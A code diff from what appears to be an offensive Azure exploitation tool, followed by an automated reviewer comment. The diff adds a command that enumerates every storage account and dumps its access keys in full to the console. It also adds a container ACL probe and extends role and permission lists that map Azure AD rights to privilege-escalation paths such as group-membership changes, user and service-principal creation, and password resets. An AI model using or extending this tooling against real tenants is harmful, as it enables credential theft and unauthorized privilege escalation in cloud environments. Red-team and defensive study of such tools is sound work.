skipped 15 lines 16 16 Token = None 17 17 accessTokenGraph = None 18 18 accessTokenVault = None 19 + storageAccessToken = None 19 20 TotalTargets = [] 20 21 TargetSubscription = None 21 22 TargetTenantId = None skipped 166 lines 188 189 hasGraphAccess = False 189 190 hasVaultEnabled = False 190 191 Token = token 191 - listSubs = ListSubscriptionsForToken() 192 - TargetSubscription = listSubs['value'][0]['subscriptionId'] 193 - TargetTenantId = parseTenantId() 192 + try: 193 + listSubs = ListSubscriptionsForToken() 194 + TargetSubscription = listSubs['value'][0]['subscriptionId'] 195 + TargetTenantId = parseTenantId() 196 + except KeyError: 197 + pass 194 198 195 199 196 200 def originitToken(token): skipped 55 lines 252 256 result.append(item) 253 257 return result 254 258 259 + def ContainerACL(storageAccount): 260 + global storageAccessToken 261 + r = sendGETRequest("https://"+storageAccount+".blob.core.windows.net/dev?restype=container&comp=acl", accessTokenGraph) 262 + return r["status_code"] 263 + 255 264 def RD_ListAllUsers(): 256 265 global accessTokenGraph 257 266 r = sendGETRequest("https://graph.microsoft.com/v1.0/users/", accessTokenGraph) skipped 185 lines 443 452 item['resourceGroup'] = res['name'] 444 453 result.append(item) 445 454 return result 455 + def RD_ListAllStorageAccountsKeys(AccId): 456 + global Token 457 + r = sendPOSTRequest("https://management.azure.com/"+AccId+"/listKeys?api-version=2022-05-01", None, Token) 458 + return r['json'] 459 + 446 460 def RD_ListAllStorageAccounts(): 447 461 global Token 448 462 result = [] skipped 2 lines 451 465 for res in getResGroup(sub['subscriptionId'])['value']: 452 466 rsVM = sendGETRequest("https://management.azure.com/subscriptions/"+sub['subscriptionId']+"/resourceGroups/"+res['name']+"/providers/Microsoft.Storage/storageAccounts?api-version=2021-09-01", Token) 453 467 for item in rsVM['json']['value']: 468 + 454 469 item['subscriptionId'] = sub['subscriptionId'] 455 470 item['resourceGroup'] = 
res['name'] 456 471 skipped 237 lines 694 709 vaultAbuseCertAndKeysOnlyRoles = ["Key Vault Certificates Officer", "Key Vault Crypto Officer"] 695 710 shadowRisks = ["Cloud Application Administrator", "Application Administrator", "Password Administrator", 696 711 "Privileged Authentication Administrator", "Authentication Administrator", 697 - "Privileged Role Administrator", "User Account Administrator", "User Administartor ", 698 - "Helpdesk Administartor"] 712 + "Privileged Role Administrator", "User Account Administrator", "User Administrator " , " User Access Administrator ", 713 + "Helpdesk Administrator", "Directory Synchronization Accounts", "Hybrid Identity Administrator"] 699 714 classicAdministartors = ["Account Administrator", "Service Administrator", "Co-Administrator"] 700 715 if currentRoleName in vaultAbuseRoles: 701 716 return currentRoleName + "|" + "allows to retrieve secrets from key vault." skipped 7 lines 709 724 return currentRoleName + "|" + "Can read everything in Azure AD, without the ability to update." 710 725 elif currentRoleName == "Global Administrator" or currentRoleName == "Company Administrator": 711 726 return currentRoleName + "|" + "has a god mode, which can manage all aspects of Azure AD. (think like Domain Admin)" 727 + elif currentRoleName == "User Administrator" or currentRoleName == "Groups Administrators" or currentRoleName == "Directory Writers": 728 + return currentRoleName + "|" + "has permissions to modify group membership in Azure AD." 712 729 elif currentRoleName == "Virtual Machine Contributor": 713 730 return currentRoleName + "|" + "allows manage of VMs including disks, snapshots, extensions, and password restoration." 714 731 elif currentRoleName == "Automation Operator" or currentRoleName == "Automation Contributor": skipped 3 lines 718 735 elif currentRoleName == "User Access Administrator": 719 736 return currentRoleName + "|" + "has manage access to all resources within the subscription." 
720 737 elif currentRoleName in shadowRisks: 721 - return currentRoleName + "|" + " has full directory admin rights, easy way to esclate." 738 + return currentRoleName + "|" + " has full directory admin rights, easy way to esclate ( i . e . use change password ) ." 722 739 elif currentRoleName in classicAdministartors: 723 740 return currentRoleName + "|" + "Is found as one of the three classic subscription administrative roles. Please notice: Service Administrator and Account Administrator are equivalent to the Owner role in the subscription." 724 741 elif currentRoleName == "Owner": skipped 18 lines 743 760 "Microsoft.Storage/listServiceSas/action"] 744 761 ARMTemplateAbuse = ["Microsoft.Resources/deployments/*"] 745 762 DirectoryAbuse = ["Microsoft.Resources/deployments/*"] 763 + AllowGroupModify = ["microsoft.directory/groups/members/update"] 764 + AllowUserCreation = ["microsoft.directory/users/create"] 765 + allowsSPCreation = ["microsoft.directory/servicePrincipals/create"] 766 + allowsSPUpdate = ["microsoft.directory/servicePrincipals/credentials/update"] 746 767 ExtensionsAbuse = ["Microsoft.ClassicCompute/virtualMachines/extensions/*", 747 768 "Microsoft.Compute/virtualMachines/extensions/read", 748 769 "Microsoft.Compute/virtualMachines/extensions/write"] skipped 10 lines 759 780 return "" + "|" + "That's means to have a Contributor/Owner permission on resources." 760 781 elif currentPermission in vmPermissions: 761 782 return currentPermission + "|" + "allows execute code on Virtual Machines." 783 + elif currentPermission in allowsSPCreation: 784 + return currentPermission + "|" + "allows creation of new application registration (service principle)." 785 + elif currentPermission in allowsSPUpdate: 786 + return currentPermission + "|" + "allows add service principle for an existing application registration." 787 + elif currentPermission in AllowGroupModify: 788 + return currentPermission + "|" + "allows modify group membership in Azure AD." 
789 + elif currentPermission in AllowUserCreation: 790 + return currentPermission + "|" + "allows new user creation in Azure AD." 762 791 elif currentPermission in vmAllowDeployPermission: 763 - return currentPermission + "|" + "allows VM deployment or configuraiton of existing VM." 792 + return currentPermission + "|" + "allows VM deployment or configuration of existing VM." 764 793 elif currentPermission in StorangeAccountAbuse: 765 794 return currentPermission + "|" + "can abuse storage accounts (i.e., view blobs)." 766 795 elif currentPermission in ARMTemplateAbuse: skipped 242 lines 1009 1038 print(banner) 1010 1039 ''' 1011 1040 supportedCommands = [ 1012 - "test", 1013 1041 "whoami", 1014 1042 "scopes", 1015 1043 "get_subs", skipped 29 lines 1045 1073 "Reader/ListAppServiceSites", 1046 1074 "Reader/ListVirtualMachines", 1047 1075 "Reader/ListAllStorageAccounts", 1076 + "Reader/ListStorageAccountsKeys", 1048 1077 "Reader/ARMTemplatesDisclosure", 1049 - "Reader/ListServicePrincipal", 1078 + "Reader/ListServicePrincipals", 1050 1079 "Reader/abuseServicePrincipals", 1051 1080 "Contributor/ListACRCredentials", 1052 1081 "Contributor/ReadVaultSecret", skipped 23 lines 1076 1105 print("Use run command only within an exploit.") 1077 1106 elif mode == "whoami": 1078 1107 currentProfile() 1079 - elif mode == "test": 1080 - x = sendGETRequest("https://management.azure.com/subscriptions/?api-version=2017-05-10", Token) 1081 - print(dict(x['headers'])['Content-Type']) 1082 1108 elif mode == "scopes": 1083 1109 currentScope() 1084 1110 elif mode == "get_subs" or mode == "subs": skipped 459 lines 1544 1570 ) 1545 1571 AllStorageAccountRecordsCount += 1 1546 1572 print(make_table(field_names, rows)) 1573 + elif "Reader/ListStorageAccountsKeys" in ExploitChoosen and mode == "run": 1574 + print("Trying to list all storage accounts keys.. 
(it might take a few minutes)") 1575 + if len(RD_ListAllStorageAccounts()) < 1: 1576 + print("No Storage Accounts were found.") 1577 + else: 1578 + field_names = ["#", "Name", "Location", "Type", "Key", "Value", "Permissions", "Resource Group"] 1579 + rows = [] 1580 + AllStorageAccountRecordsCount = 0 1581 + for SARecord in RD_ListAllStorageAccounts(): 1582 + Data = RD_ListAllStorageAccountsKeys(SARecord['id']) 1583 + for key in Data['keys']: 1584 + rows.append( 1585 + {"#": AllStorageAccountRecordsCount, 1586 + "Name": SARecord['name'], 1587 + "Location": SARecord['location'], 1588 + "Type": SARecord['type'], 1589 + "Key": key['keyName'], 1590 + "Value": key['value'], 1591 + "Permissions": key['permissions'], 1592 + "Resource Group": SARecord['resourceGroup'] 1593 + } 1594 + ) 1595 + AllStorageAccountRecordsCount += 1 1596 + print(make_table(field_names, rows)) 1547 1597 elif "Reader/ListAllVaults" in ExploitChoosen and mode == "run": 1548 1598 print("Trying to list all vaults.. (it might take a few minutes)") 1549 1599 if len(RD_ListAllVaults()) < 1: skipped 49 lines 1599 1649 ) 1600 1650 AllVMRecordsCount += 1 1601 1651 print(make_table(field_names, rows)) 1602 - elif "Reader/ListServicePrincipal " in ExploitChoosen and mode == "run": 1652 + elif "Reader/ListServicePrincipals " in ExploitChoosen and mode == "run": 1603 1653 print("Trying to enumerate all service principles (App registrations)..") 1604 1654 if len(RD_AddAppSecret()) < 1: 1605 1655 print("No Apps registrations were found.") skipped 281 lines
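Review bot: `Data['keys']` at new line 1583 raises KeyError whenever listKeys does not return a key list, because `RD_ListAllStorageAccountsKeys` returns `r['json']` unconditionally and the built-in Reader role does not include the listKeys action, so an error body rather than keys is the likely response for the "Reader/" audience this command is filed under. Guard the response, e.g. `for key in Data.get('keys', []):`, or test `'keys' in Data` and print the error body so the failure is visible instead of a traceback. `RD_ListAllStorageAccounts()` is also called twice (new lines 1575 and 1581), doubling the management-API enumeration; bind it once with `accounts = RD_ListAllStorageAccounts()` and reuse it for both the length check and the loop. Since new line 1590 prints each key value in full to the console, consider masking all but a short prefix by default so secrets do not land in terminal scrollback or logs. The enclosing elif chain starts and ends outside the hunk.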